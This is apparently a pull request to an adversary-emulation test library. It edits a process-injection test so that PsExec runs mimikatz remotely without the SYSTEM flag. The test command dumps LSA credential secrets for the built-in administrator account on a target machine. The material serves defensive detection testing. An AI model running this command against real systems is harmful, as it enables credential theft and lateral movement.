### PR TITLE
T1055: psexec "-s" is not required

### DIFF
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -108,6 +108,6 @@ atomic_tests:
       Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force
   executor:
     command: |
-      #{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"
+      #{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"
     name: command_prompt
     elevation_required: false # locally not, but remotely on target machine then yes


### PR DESCRIPTION
**Details:**
Since the user is admin the debug privilege is automatically obtained when necessary for the injection
The TTP is also clearer because mimikatz runs as the current user (used for psexec) and not as SYSTEM

**Testing:**
Tested locally, still works.
* before:
![image](https://user-images.githubusercontent.com/550823/110459321-20b02d80-80cd-11eb-8382-12e22a6ca694.png)

* after:
![image](https://user-images.githubusercontent.com/550823/110459328-23ab1e00-80cd-11eb-8102-b148ec61660c.png)


**Associated Issues:**
None